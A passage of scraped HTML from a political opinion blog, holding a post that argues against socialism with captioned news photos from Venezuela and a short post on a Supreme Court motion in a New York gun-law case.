lying politicians and vote for socialism anyway. The media won&#8217;t tell you these truths, so here is the truth about socialism laid bare before us in Venezuela.</p> <h3>-Venezuela was one of the world&#8217;s largest oil producers with enormous oil reserves. (1999)</h3> <div style="width: 590px" class="wp-caption alignnone"><img class="" src="https://www.opec.org/opec_web/static_files_project/images/content/data_graphs/GRAPH%20OPEC%20%20share%20world%20crude%20oil%20reserves%202017.jpg" alt="" width="580" height="351" /><p class="wp-caption-text"><strong>World Oil Reserves- OPEC 2017</strong></p></div> <p>Source-https://www.opec.org/opec_web/static_files_project/images/content/data_graphs/GRAPH%20OPEC%20%20share%20world%20crude%20oil%20reserves%202017.jpg</p> <h3>-When legislators determine what can be bought and sold, the first thing to be purchased are legislators.. and voters.</h3> <div style="width: 543px" class="wp-caption alignnone"><img class="" src="https://static.independent.co.uk/s3fs-public/thumbnails/image/2018/05/21/05/maduro-venezuela.jpg" alt="" width="533" height="380" /><p class="wp-caption-text"><strong>Chavez wins again 2010. Granted new powers</strong></p></div> <p>Sources- <a href="https://www.socialist.net/venezuela-elections-2010.htm" rel="nofollow">https://www.socialist.net/venezuela-elections-2010.htm</a><br /> <a href="http://www.cnn.com/2010/WORLD/americas/09/27/venezuela.elections/index.html" rel="nofollow">http://www.cnn.com/2010/WORLD/americas/09/27/venezuela.elections/index.html</a><br /> <a href="https://www.reuters.com/article/venezuela-banks/update-6-venezuela-assembly-gives-chavez-decree-powers-idUSN1729156220101217" rel="nofollow">https://www.reuters.com/article/venezuela-banks/update-6-venezuela-assembly-gives-chavez-decree-powers-idUSN1729156220101217</a></p> <h3>-Free speech and the rule of law are a threat to government power.</h3> <div style="width: 516px" class="wp-caption alignnone"><img class="" src="https://static01.nyt.com/images/2010/04/04/world/04venez_CA0/04venez_CA0-popup.jpg" alt="" width="506" height="380" /><p class="wp-caption-text"><strong>Judge Arrested After Ruling Against Socialists New York Times- 2010</strong></p></div> <p id="headline" class="headline">Source- <a href="https://www.nytimes.com/2010/04/04/world/americas/04venez.html" rel="nofollow">https://www.nytimes.com/2010/04/04/world/americas/04venez.html</a></p> <h3>-A government disarms its populace so the rich and powerful can do things they couldn&#8217;t do to armed citizens. (2012)</h3> <p>Hint- If both parties in the exchange didn&#8217;t agree, then it wasn&#8217;t capitalism. Socialism is imposed at the point of a gun.</p> <div style="width: 496px" class="wp-caption alignnone"><img class="" src="https://ichef.bbci.co.uk/news/304/media/images/60631000/jpg/_60631172_014784389-1.jpg" alt="" width="486" height="273" /><p class="wp-caption-text"><strong>Venezuelan Government Destroys Private Arms</strong></p></div> <p>Source- <a href="https://www.bbc.com/news/world-latin-america-18288430" rel="nofollow">https://www.bbc.com/news/world-latin-america-18288430</a></p> <h3>-Modern infrastructure is constantly under repair. A society can&#8217;t survive when politicians steal supplies for the water supply, electrical supply, the local hospital, and oil production. (2012)</h3> <p><img class="" src="https://ichef.bbci.co.uk/news/624/cpsprodpb/9F32/production/_105345704_oil-nc.png" alt="" width="545" height="443" /></p> <p><strong>Venezuelan Oil Production Falls by 60 Percent</strong><br /> Source- <a href="https://www.bbc.com/news/business-47023002" rel="nofollow">https://www.bbc.com/news/business-47023002</a></p> <div class="embed-thenewyorktimes"><iframe title="No End in Sight to Venezuela’s Blackout, Experts Warn" src="https://www.nytimes.com/svc/oembed/html/?url=https%3A%2F%2Fwww.nytimes.com%2F2019%2F03%2F11%2Fworld%2Famericas%2Fvenzuela-blackout-maduro.html" scrolling="no" frameborder="0" allowtransparency="true" style="border:none;max-width:500px;min-width:300px;min-height:550px;display:block;width:100%;"></iframe></div> <h3>-Democratic Socialism includes shooting and running over protesters. The government does not need to listen when they are armed and citizens are disarmed. 2014</h3> <div style="width: 490px" class="wp-caption aligncenter"><img src="https://static01.nyt.com/images/2014/02/20/blogs/lede_venez_1/lede_venez_1-blog480.jpg" alt="" width="480" height="322" /><p class="wp-caption-text"><strong>Beauty Queen Among Protestors Killed by Police (2014)</strong></p></div> <p>&nbsp;</p> <div style="width: 554px" class="wp-caption aligncenter"><img class="" src="https://cdn.cnn.com/cnnnext/dam/assets/170623160636-02-graphic-vz-protester-shot-0622-restricted-story-body-exlarge-169.jpg" alt="" width="544" height="305" /><p class="wp-caption-text"><strong>Protestors Killed by Venezuelan Police (2017)</strong></p></div> <p>&nbsp;</p> <p><img class="aligncenter" src="https://cdn.cnn.com/cnnnext/dam/assets/170505102117-03-venezuela-tank-rollover-0503-super-169.jpg" width="478" height="269" /></p> <p style="text-align:center;"><strong>Venezuelan Police Run Over Protestors with Armored Car (2019)</strong></p> <p>Source- <a href="https://thelede.blogs.nytimes.com/2014/02/20/venezuelan-beauty-queen-is-among-protesters-killed/" rel="nofollow">https://thelede.blogs.nytimes.com/2014/02/20/venezuelan-beauty-queen-is-among-protesters-killed/</a></p> <p><a href="https://www.cnn.com/2017/05/05/americas/venezuela-unrest-tank/index.html" rel="nofollow">https://www.cnn.com/2017/05/05/americas/venezuela-unrest-tank/index.html</a></p> <p>&nbsp;</p> <h3>-You can vote your way into socialism, but you have to shoot your way out of it.</h3> <p>Sources-https://www.cfr.org/article/maduros-allies-who-backs-venezuelan-regime<br /> panampost.com/josefina-blanco/2019/02/20/proof-of-extensive-cuban-military-presence-in-the-venezuelan-armed-forces<br /> panampost.com/orlando-avendano/2017/07/20/cuba-has-occupying-army-in-venezuela<br /> ~_~_</p> <p>What did I give you if a picture is worth a thousand words? RM</p> <div id="jp-post-flair" class="sharedaddy sd-rating-enabled sd-like-enabled sd-sharing-enabled"><div class="sd-block sd-rating"><h3 class="sd-title">Rate this:</h3><div class="cs-rating pd-rating" id="pd_rating_holder_4489229_post_15463" data-settings="{&quot;id&quot;:4489229,&quot;item_id&quot;:&quot;_post_15463&quot;,&quot;settings&quot;:&quot;{\&quot;id\&quot;:4489229,\&quot;unique_id\&quot;:\&quot;wp-post-15463\&quot;,\&quot;title\&quot;:\&quot;The%20Truth%20of%20Socialism%20on%20the%20Little%26nbsp%3BScreen\&quot;,\&quot;permalink\&quot;:\&quot;https:\\\/\\\/slowfacts.wordpress.com\\\/2019\\\/05\\\/01\\\/the-truth-of-socialism-on-the-little-screen\\\/\&quot;,\&quot;item_id\&quot;:\&quot;_post_15463\&quot;}&quot;}"></div></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-official sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://slowfacts.wordpress.com/2019/05/01/the-truth-of-socialism-on-the-little-screen/" data-text="The Truth of Socialism on the Little Screen" data-via="wordpressdotcom" data-related="wordpressdotcom">Tweet</a></li><li class="share-facebook"><div class="fb-share-button" data-href="https://slowfacts.wordpress.com/2019/05/01/the-truth-of-socialism-on-the-little-screen/" data-layout="button_count"></div></li><li class="share-reddit"><div class="reddit_button"><iframe src="https://www.reddit.com/static/button/button1.html?newwindow=true&width=120&amp;url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F01%2Fthe-truth-of-socialism-on-the-little-screen%2F&amp;title=The%20Truth%20of%20Socialism%20on%20the%20Little%20Screen" height="22" width="120" scrolling="no" frameborder="0"></iframe></div></li><li class="share-tumblr"><a class="tumblr-share-button" target="_blank" href="https://www.tumblr.com/share" data-title="The Truth of Socialism on the Little Screen" data-content="https://slowfacts.wordpress.com/2019/05/01/the-truth-of-socialism-on-the-little-screen/" title="Share on Tumblr"data-posttype="link">Share on Tumblr</a></li><li class="share-pinterest"><div class="pinterest_button"><a href="https://www.pinterest.com/pin/create/button/?url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F05%2F01%2Fthe-truth-of-socialism-on-the-little-screen%2F&#038;media=https%3A%2F%2Fwww.opec.org%2Fopec_web%2Fstatic_files_project%2Fimages%2Fcontent%2Fdata_graphs%2FGRAPH%2520OPEC%2520%2520share%2520world%2520crude%2520oil%2520reserves%25202017.jpg&#038;description=The%20Truth%20of%20Socialism%20on%20the%20Little%20Screen" data-pin-do="buttonPin" data-pin-config="beside"><img src="//assets.pinterest.com/images/pidgets/pinit_fg_en_rect_gray_20.png" /></a></div></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button" href="https://slowfacts.wordpress.com/2019/05/01/the-truth-of-socialism-on-the-little-screen/?share=email" target="_blank" title="Click to email this to a friend"><span>Email</span></a></li><li class="share-linkedin"><div class="linkedin_button"><script type="in/share" data-url="https://slowfacts.wordpress.com/2019/05/01/the-truth-of-socialism-on-the-little-screen/" data-counter="right"></script></div></li><li class="share-pocket"><div class="pocket_button"><a href="https://getpocket.com/save" class="pocket-btn" data-lang="en" data-save-url="https://slowfacts.wordpress.com/2019/05/01/the-truth-of-socialism-on-the-little-screen/" data-pocket-count="horizontal" >Pocket</a></div></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-23064700-15463-5cdd8cda06349' data-src='//widgets.wp.com/likes/index.html?ver=20190321#blog_id=23064700&amp;post_id=15463&amp;origin=slowfacts.wordpress.com&amp;obj_id=23064700-15463-5cdd8cda06349' data-name='like-post-frame-23064700-15463-5cdd8cda06349'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div></div> </div><!--end entry--> <div class="post-footer"> <div class="comments"><a href="https://slowfacts.wordpress.com/2019/05/01/the-truth-of-socialism-on-the-little-screen/#comments">3 Comments</a></div> <div class="categories">from &rarr; <a href="https://slowfacts.wordpress.com/category/corruption/" rel="category tag">corruption</a>, <a href="https://slowfacts.wordpress.com/category/government-corruption/" rel="category tag">government corruption</a>, <a href="https://slowfacts.wordpress.com/category/politics/" rel="category tag">politics</a></div> </div><!--end post footer--> </div><!--end post--> <div id="post-15461" class="post-15461 post type-post status-publish format-standard hentry category-uncategorized"> <div class="post-header"> <h2><a href="https://slowfacts.wordpress.com/2019/04/30/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied/" rel="bookmark">No Lawyers &#8211; Only Guns and Money: SCOTUS To New York City &#8211; Motion&nbsp;Denied</a></h2> <div class="date">April 30, 2019</div> </div><!--end post header--> <div class="meta clear"> <div class="tags"></div> <div class="author"> </div> </div><!--end meta--> <div class="entry clear"> <p>The city of New York has terrible gun laws. Those laws infringe on the rights of honest citizens. The city was sued and the lawsuit appealed to the US Supreme court. The city said, &#8216;Fine, we&#8217;ll change our laws so there is no case.&#8217; The US Supreme court disagreed and said there is a case as long as the infringements continue. RM</p> <p>From my friend John Richardson- &#8220;The City of New York had filed a motion to hold the briefing schedule in NY State Rifle and Pistol Association v. City of New York in abeyance. Their argument was that since the NYPD were proposing to modify regulations on transport for those with premises permits that the briefing schedule should be suspended. In other words, we say we are going to change the regulations in question which might moot the case so don&#8217;t make us go to all the work necessary to respond to the plaintiffs.&#8221;</p> <p>Source: <a href="http://onlygunsandmoney.blogspot.com/2019/04/scotus-to-new-york-city-motion-denied.html">No Lawyers &#8211; Only Guns and Money: SCOTUS To New York City &#8211; Motion Denied</a></p> <div id="jp-post-flair" class="sharedaddy sd-rating-enabled sd-like-enabled sd-sharing-enabled"><div class="sd-block sd-rating"><h3 class="sd-title">Rate this:</h3><div class="cs-rating pd-rating" id="pd_rating_holder_4489229_post_15461" data-settings="{&quot;id&quot;:4489229,&quot;item_id&quot;:&quot;_post_15461&quot;,&quot;settings&quot;:&quot;{\&quot;id\&quot;:4489229,\&quot;unique_id\&quot;:\&quot;wp-post-15461\&quot;,\&quot;title\&quot;:\&quot;No%20Lawyers%20%26%238211%3B%20Only%20Guns%20and%20Money%3A%20SCOTUS%20To%20New%20York%20City%20%26%238211%3B%20Motion%26nbsp%3BDenied\&quot;,\&quot;permalink\&quot;:\&quot;https:\\\/\\\/slowfacts.wordpress.com\\\/2019\\\/04\\\/30\\\/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied\\\/\&quot;,\&quot;item_id\&quot;:\&quot;_post_15461\&quot;}&quot;}"></div></div><div class="sharedaddy sd-sharing-enabled"><div class="robots-nocontent sd-block sd-social sd-social-official sd-sharing"><h3 class="sd-title">Share this:</h3><div class="sd-content"><ul><li class="share-twitter"><a href="https://twitter.com/share" class="twitter-share-button" data-url="https://slowfacts.wordpress.com/2019/04/30/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied/" data-text="No Lawyers - Only Guns and Money: SCOTUS To New York City - Motion Denied" data-via="wordpressdotcom" data-related="wordpressdotcom">Tweet</a></li><li class="share-facebook"><div class="fb-share-button" data-href="https://slowfacts.wordpress.com/2019/04/30/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied/" data-layout="button_count"></div></li><li class="share-reddit"><div class="reddit_button"><iframe src="https://www.reddit.com/static/button/button1.html?newwindow=true&width=120&amp;url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F04%2F30%2Fno-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied%2F&amp;title=No%20Lawyers%20-%20Only%20Guns%20and%20Money%3A%20SCOTUS%20To%20New%20York%20City%20-%20Motion%20Denied" height="22" width="120" scrolling="no" frameborder="0"></iframe></div></li><li class="share-tumblr"><a class="tumblr-share-button" target="_blank" href="https://www.tumblr.com/share" data-title="No Lawyers - Only Guns and Money: SCOTUS To New York City - Motion Denied" data-content="https://slowfacts.wordpress.com/2019/04/30/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied/" title="Share on Tumblr"data-posttype="link">Share on Tumblr</a></li><li class="share-pinterest"><div class="pinterest_button"><a href="https://www.pinterest.com/pin/create/button/?url=https%3A%2F%2Fslowfacts.wordpress.com%2F2019%2F04%2F30%2Fno-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied%2F&#038;media=https%3A%2F%2F0.gravatar.com%2Favatar%2F9f7f67aca07bead7ad4c862b14107a04%3Fs%3D96%26amp%3Bd%3Didenticon%26amp%3Br%3DG&#038;description=No%20Lawyers%20-%20Only%20Guns%20and%20Money%3A%20SCOTUS%20To%20New%20York%20City%20-%20Motion%20Denied" data-pin-do="buttonPin" data-pin-config="beside"><img src="//assets.pinterest.com/images/pidgets/pinit_fg_en_rect_gray_20.png" /></a></div></li><li class="share-email"><a rel="nofollow noopener noreferrer" data-shared="" class="share-email sd-button" href="https://slowfacts.wordpress.com/2019/04/30/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied/?share=email" target="_blank" title="Click to email this to a friend"><span>Email</span></a></li><li class="share-linkedin"><div class="linkedin_button"><script type="in/share" data-url="https://slowfacts.wordpress.com/2019/04/30/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied/" data-counter="right"></script></div></li><li class="share-pocket"><div class="pocket_button"><a href="https://getpocket.com/save" class="pocket-btn" data-lang="en" data-save-url="https://slowfacts.wordpress.com/2019/04/30/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied/" data-pocket-count="horizontal" >Pocket</a></div></li><li class="share-end"></li></ul></div></div></div><div class='sharedaddy sd-block sd-like jetpack-likes-widget-wrapper jetpack-likes-widget-unloaded' id='like-post-wrapper-23064700-15461-5cdd8cda07c68' data-src='//widgets.wp.com/likes/index.html?ver=20190321#blog_id=23064700&amp;post_id=15461&amp;origin=slowfacts.wordpress.com&amp;obj_id=23064700-15461-5cdd8cda07c68' data-name='like-post-frame-23064700-15461-5cdd8cda07c68'><h3 class='sd-title'>Like this:</h3><div class='likes-widget-placeholder post-likes-widget-placeholder' style='height: 55px;'><span class='button'><span>Like</span></span> <span class="loading">Loading...</span></div><span class='sd-text-color'></span><a class='sd-link-color'></a></div></div> </div><!--end entry--> <div class="post-footer"> <div class="comments"><a href="https://slowfacts.wordpress.com/2019/04/30/no-lawyers-only-guns-and-money-scotus-to-new-york-city-motion-denied/#respond">Leave a comment</a></div> <div class="categories">from &rarr; <a href="https://slowfacts.wordpress.com/category/uncategorized/" rel="category tag">Uncategorized</a></div> </div><!--end post footer--> </div><!--end post--> <div class="navigation index"> <div class="alignleft"><a href="https://slowfacts.wordpress.com/page/2/" >&laquo; Older Entries</a></div> <div class="alignright"></div> </div><!--end navigation--> </div><!--end content--> <div id="sidebar"> <ul> <li id="search-3" class="widget widget_search"><h2 class="widgettitle">Search SlowFacts</h2><form method="get" id="search_form" action="https://slowfacts.wordpress.com/"> <div> <input type="text" value="type and press enter" name="s" id="s" onfocus="if (this.value == 'type and press enter') {this.value = '';}" onblur="if (this.value == '') {this.value = 'type and press enter';}" /> <input type="hidden" value="Search" /> </div> </form></li><li id="categories-3" class="widget widget_categories"><h2 class="widgettitle">Topics</h2> <ul> <li class="cat-item cat-item-177"><a href="https://slowfacts.wordpress.com/category/art/">art</a> (21) </li> <li class="cat-item cat-item-1337"><a href="https://slowfacts.wordpress.com/category/california/">California</a> (90) </li> <li class="cat-item cat-item-9225547"><a href="https://slowfacts.wordpress.com/category/celebrity-violence/">celebrity violence</a> (6) </li> <li class="cat-item cat-item-22388"><a href="https://slowfacts.wordpress.com/category/corruption/">corruption</a> (116) </li> <li class="cat-item cat-item-1098"><a href="https://slowfacts.wordpress.com/category/culture/">culture</a> (225) </li> <li class="cat-item cat-item-1628170"><a href="https://slowfacts.wordpress.com/category/dc-government/">DC government</a> (8) </li> <li class="cat-item cat-item-23802506"><a href="https://slowfacts.wordpress.com/category/defensive-gun-use/">defensive gun use</a> (11) </li> <li class="cat-item cat-item-657"><a href="https://slowfacts.wordpress.com/category/economics/">economics</a> (178) </li> <li class="cat-item cat-item-1342"><a href="https://slowfacts.wordpress.com/category/education/">education</a> (35) </li> <li class="cat-item cat-item-96120555"><a href="https://slowfacts.wordpress.com/category/emily-miller-2/">Emily Miller</a> (13) </li> <li class="cat-item cat-item-1212"><a href="https://slowfacts.wordpress.com/category/energy/">energy</a> (12) </li> <li class="cat-item cat-item-184"><a href="https://slowfacts.wordpress.com/category/environment/">environment</a> (9) </li> <li class="cat-item cat-item-406"><a href="https://slowfacts.wordpress.com/category/family/">family</a> (9) </li> <li class="cat-item cat-item-161140"><a href="https://slowfacts.wordpress.com/category/faster/">FASTER</a> (65) </li> <li class="cat-item cat-item-148544"><a href="https://slowfacts.wordpress.com/category/government-corruption/">government corruption</a> (348) </li> <li class="cat-item cat-item-34622015"><a href="https://slowfacts.wordpress.com/category/gratitude-2/">gratitude</a> (65) </li> <li class="cat-item cat-item-19676958"><a href="https://slowfacts.wordpress.com/category/grpc/">GRPC</a> (5) </li> <li class="cat-item cat-item-4761"><a href="https://slowfacts.wordpress.com/category/gun-control/">gun control</a> (243) </li> <li class="cat-item cat-item-325096"><a href="https://slowfacts.wordpress.com/category/gun-culture/">gun culture</a> (102) </li> <li class="cat-item cat-item-37610"><a href="https://slowfacts.wordpress.com/category/heroes/">heroes</a> (40) </li> <li class="cat-item cat-item-678"><a href="https://slowfacts.wordpress.com/category/history/">history</a> (15) </li> <li class="cat-item cat-item-10949"><a href="https://slowfacts.wordpress.com/category/human-nature/">human nature</a> (258) </li> <li class="cat-item cat-item-376"><a href="https://slowfacts.wordpress.com/category/humor/">humor</a> (145) </li> <li class="cat-item cat-item-21774"><a href="https://slowfacts.wordpress.com/category/invention/">invention</a> (4) </li> <li class="cat-item cat-item-9688721"><a href="https://slowfacts.wordpress.com/category/kenn-blanchard/">Kenn Blanchard</a> (13) </li> <li class="cat-item cat-item-35134845"><a href="https://slowfacts.wordpress.com/category/law-enforcement-2/">law enforcement</a> (33) </li> <li class="cat-item cat-item-186238121"><a href="https://slowfacts.wordpress.com/category/laws-for-them-2/">laws for them</a> (50) </li> <li class="cat-item cat-item-13054"><a href="https://slowfacts.wordpress.com/category/liberty/">liberty</a> (281) </li> <li class="cat-item cat-item-1099"><a href="https://slowfacts.wordpress.com/category/nature/">nature</a> (16) </li> <li class="cat-item cat-item-3996"><a href="https://slowfacts.wordpress.com/category/news-media/">news media</a> (178) </li> <li class="cat-item cat-item-40221"><a href="https://slowfacts.wordpress.com/category/nuclear-power/">Nuclear Power</a> (11) </li> <li class="cat-item cat-item-398"><a href="https://slowfacts.wordpress.com/category/politics/">politics</a> (605) </li> <li class="cat-item cat-item-160408918"><a href="https://slowfacts.wordpress.com/category/politics-and-guns-podcast/">Politics and Guns Podcast</a> (20) </li> <li class="cat-item cat-item-164162"><a href="https://slowfacts.wordpress.com/category/prohibition/">prohibition</a> (284) </li> <li class="cat-item cat-item-1756170"><a href="https://slowfacts.wordpress.com/category/public-choice-theory/">public choice theory</a> (37) </li> <li class="cat-item cat-item-1250180"><a href="https://slowfacts.wordpress.com/category/public-debt/">public debt</a> (59) </li> <li class="cat-item cat-item-20722685"><a href="https://slowfacts.wordpress.com/category/public-violence/">Public Violence</a> (93) </li> <li class="cat-item cat-item-18129"><a href="https://slowfacts.wordpress.com/category/quote-of-the-day/">quote of the day</a> (4) </li> <li class="cat-item cat-item-13443"><a href="https://slowfacts.wordpress.com/category/racism/">racism</a> (15) </li> <li class="cat-item cat-item-116"><a href="https://slowfacts.wordpress.com/category/religion/">religion</a> (7) </li> <li class="cat-item cat-item-5690"><a href="https://slowfacts.wordpress.com/category/san-diego/">San Diego</a> (37) </li> <li class="cat-item cat-item-102988"><a href="https://slowfacts.wordpress.com/category/second-amendment/">second amendment</a> (51) </li> <li class="cat-item cat-item-32809"><a href="https://slowfacts.wordpress.com/category/self-defense/">self defense</a> (367) </li> <li class="cat-item cat-item-41243"><a href="https://slowfacts.wordpress.com/category/shooting/">shooting</a> (79) </li> <li class="cat-item cat-item-2097542"><a href="https://slowfacts.wordpress.com/category/smaller-government/">smaller government</a> (25) </li> <li class="cat-item cat-item-10715587"><a href="https://slowfacts.wordpress.com/category/sport-shooting/">sport shooting</a> (35) </li> <li class="cat-item cat-item-1"><a href="https://slowfacts.wordpress.com/category/uncategorized/">Uncategorized</a> (190) </li> </ul> </li><li id="tag_cloud-2" class="widget widget_tag_cloud"><h2 class="widgettitle"></h2><div style="overflow: hidden;"><a href="https://slowfacts.wordpress.com/category/art/" style="font-size: 100%; padding: 1px; margin: 1px;" title="art (21)">art</a> <a href="https://slowfacts.wordpress.com/category/california/" style="font-size: 120.67636986301%; padding: 1px; margin: 1px;" title="California (90)">California</a> <a href="https://slowfacts.wordpress.com/tag/corruption/" style="font-size: 128.46746575342%; padding: 1px; margin: 1px;" title="corruption (116)">corruption</a> <a href="https://slowfacts.wordpress.com/category/culture/" style="font-size: 161.1301369863%; padding: 1px; margin: 1px;" title="culture (225)">culture</a> <a href="https://slowfacts.wordpress.com/category/economics/" style="font-size: 147.04623287671%; padding: 1px; margin: 1px;" title="economics (178)">economics</a> <a href="https://slowfacts.wordpress.com/category/education/" style="font-size: 104.19520547945%; padding: 1px; margin: 1px;" title="education (35)">education</a> <a href="https://slowfacts.wordpress.com/tag/faster/" style="font-size: 113.18493150685%; padding: 1px; margin: 1px;" title="FASTER (65)">FASTER</a> <a href="https://slowfacts.wordpress.com/category/government-corruption/" style="font-size: 197.98801369863%; padding: 1px; margin: 1px;" title="government corruption (348)">government corruption</a> <a href="https://slowfacts.wordpress.com/category/gratitude-2/" style="font-size: 113.18493150685%; padding: 1px; margin: 1px;" title="gratitude (65)">gratitude</a> <a href="https://slowfacts.wordpress.com/category/gun-control/" style="font-size: 166.52397260274%; padding: 1px; margin: 1px;" title="gun control (243)">gun control</a> <a href="https://slowfacts.wordpress.com/category/gun-culture/" style="font-size: 124.27226027397%; padding: 1px; margin: 1px;" title="gun culture (102)">gun culture</a> <a href="https://slowfacts.wordpress.com/category/heroes/" style="font-size: 105.69349315068%; padding: 1px; margin: 1px;" title="heroes (40)">heroes</a> <a href="https://slowfacts.wordpress.com/category/human-nature/" style="font-size: 171.01883561644%; padding: 1px; margin: 1px;" title="human nature (258)">human nature</a> <a href="https://slowfacts.wordpress.com/category/humor/" style="font-size: 137.15753424658%; padding: 1px; margin: 1px;" title="humor (145)">humor</a> <a href="https://slowfacts.wordpress.com/category/law-enforcement-2/" style="font-size: 103.59589041096%; padding: 1px; margin: 1px;" title="law enforcement (33)">law enforcement</a> <a href="https://slowfacts.wordpress.com/category/laws-for-them-2/" style="font-size: 108.69006849315%; padding: 1px; margin: 1px;" title="laws for them (50)">laws for them</a> <a href="https://slowfacts.wordpress.com/category/liberty/" style="font-size: 177.91095890411%; padding: 1px; margin: 1px;" title="liberty (281)">liberty</a> <a href="https://slowfacts.wordpress.com/category/news-media/" style="font-size: 147.04623287671%; padding: 1px; margin: 1px;" title="news media (178)">news media</a> <a href="https://slowfacts.wordpress.com/tag/politics/" style="font-size: 275%; padding: 1px; margin: 1px;" title="politics (605)">politics</a> <a href="https://slowfacts.wordpress.com/category/prohibition/" style="font-size: 178.80993150685%; padding: 1px; margin: 1px;" title="prohibition (284)">prohibition</a> <a href="https://slowfacts.wordpress.com/category/public-choice-theory/" style="font-size: 104.79452054795%; padding: 1px; margin: 1px;" title="public choice theory (37)">public choice theory</a> <a href="https://slowfacts.wordpress.com/category/public-debt/" style="font-size: 111.38698630137%; padding: 1px; margin: 1px;" title="public debt (59)">public debt</a> <a href="https://slowfacts.wordpress.com/category/public-violence/" style="font-size: 121.57534246575%; padding: 1px; margin: 1px;" title="Public Violence (93)">Public Violence</a> <a href="https://slowfacts.wordpress.com/category/san-diego/" style="font-size: 104.79452054795%; padding: 1px; margin: 1px;" title="San Diego (37)">San Diego</a> <a href="https://slowfacts.wordpress.com/category/second-amendment/" style="font-size: 108.9897260274%; padding: 1px; margin: 1px;" title="second amendment (51)">second amendment</a> <a href="https://slowfacts.wordpress.com/category/self-defense/" style="font-size: 203.68150684932%; padding: 1px; margin: 1px;" title="self defense (367)">self defense</a> <a href="https://slowfacts.wordpress.com/category/shooting/" style="font-size: 117.3801369863%; padding: 1px; margin: 1px;" title="shooting (79)">shooting</a> <a href="https://slowfacts.wordpress.com/category/smaller-government/" style="font-size: 101.19863013699%; padding: 1px; margin: 1px;" title="smaller government (25)">smaller government</a> <a href="https://slowfacts.wordpress.com/category/sport-shooting/" style="font-size: 104.19520547945%; padding: 1px; margin: 1px;" title="sport shooting (35)">sport shooting</a> <a href="https://slowfacts.wordpress.com/category/uncategorized/" style="font-size: 150.64212328767%; padding: 1px; margin: 1px;" title="Uncategorized (190)">Uncategorized</a> </div></li><li id="wp_tag_cloud-2" class="widget wp_widget_tag_cloud"><h2 class="widgettitle"></h2><div style="overflow:hidden"><a href="https://slowfacts.wordpress.com/tag/addiction/" class="tag-cloud-link tag-link-12523 tag-link-position-1" style="font-size: 10.545454545455pt;" aria-label="addiction (7 items)">addiction</a> <a href="https://slowfacts.wordpress.com/tag/art/" class="tag-cloud-link tag-link-177 tag-link-position-2" style="font-size: 10.848484848485pt;" aria-label="art (8 items)">art</a> <a href="https://slowfacts.wordpress.com/tag/business/" class="tag-cloud-link tag-link-179 tag-link-position-3" style="font-size: 8pt;" aria-label="business (2 items)">business</a> <a href="https://slowfacts.wordpress.com/tag/california/" class="tag-cloud-link tag-link-1337 tag-link-position-4" style="font-size: 17.818181818182pt;" aria-label="California (125 items)">California</a> <a href="https://slowfacts.wordpress.com/tag/california-politicians/" class="tag-cloud-link tag-link-32546577 tag-link-position-5" style="font-size: 8pt;" aria-label="california politicians (2 items)">california politicians</a> <a href="https://slowfacts.wordpress.com/tag/celebrity-violence/" class="tag-cloud-link tag-link-9225547 tag-link-position-6" style="font-size: 10.242424242424pt;" aria-label="celebrity violence (6 items)">celebrity violence</a> <a href="https://slowfacts.wordpress.com/tag/children/" class="tag-cloud-link tag-link-1343 tag-link-position-7" style="font-size: 8pt;" aria-label="children (2 items)">children</a> <a href="https://slowfacts.wordpress.com/tag/corruption/" class="tag-cloud-link tag-link-22388 tag-link-position-8" style="font-size: 20.848484848485pt;" aria-label="corruption (397 items)">corruption</a> <a href="https://slowfacts.wordpress.com/tag/creativity/" class="tag-cloud-link tag-link-789 tag-link-position-9" style="font-size: 14.121212121212pt;" aria-label="Creativity (30 items)">Creativity</a> <a href="https://slowfacts.wordpress.com/tag/culture/" class="tag-cloud-link tag-link-1098 tag-link-position-10" style="font-size: 18.181818181818pt;" aria-label="culture (145 items)">culture</a> <a href="https://slowfacts.wordpress.com/tag/current-events/" class="tag-cloud-link tag-link-1304 tag-link-position-11" style="font-size: 12.969696969697pt;" aria-label="current-events (19 items)">current-events</a> <a href="https://slowfacts.wordpress.com/tag/d-c-government/" class="tag-cloud-link tag-link-21278233 tag-link-position-12" style="font-size: 13.878787878788pt;" aria-label="D.C. government (27 items)">D.C. government</a> <a href="https://slowfacts.wordpress.com/tag/debt/" class="tag-cloud-link tag-link-22790 tag-link-position-13" style="font-size: 16.545454545455pt;" aria-label="debt (77 items)">debt</a> <a href="https://slowfacts.wordpress.com/tag/defensive-gun-use/" class="tag-cloud-link tag-link-23802506 tag-link-position-14" style="font-size: 11.393939393939pt;" aria-label="defensive gun use (10 items)">defensive gun use</a> <a href="https://slowfacts.wordpress.com/tag/economics/" class="tag-cloud-link tag-link-657 tag-link-position-15" style="font-size: 18.424242424242pt;" aria-label="economics (159 items)">economics</a> <a href="https://slowfacts.wordpress.com/tag/economy/" class="tag-cloud-link tag-link-8590 tag-link-position-16" style="font-size: 8.7272727272727pt;" aria-label="economy (3 items)">economy</a> <a href="https://slowfacts.wordpress.com/tag/education/" class="tag-cloud-link tag-link-1342 tag-link-position-17" style="font-size: 15.151515151515pt;" aria-label="education (45 items)">education</a> <a href="https://slowfacts.wordpress.com/tag/emily-miller/" class="tag-cloud-link tag-link-621695 tag-link-position-18" style="font-size: 11.818181818182pt;" aria-label="Emily MIller 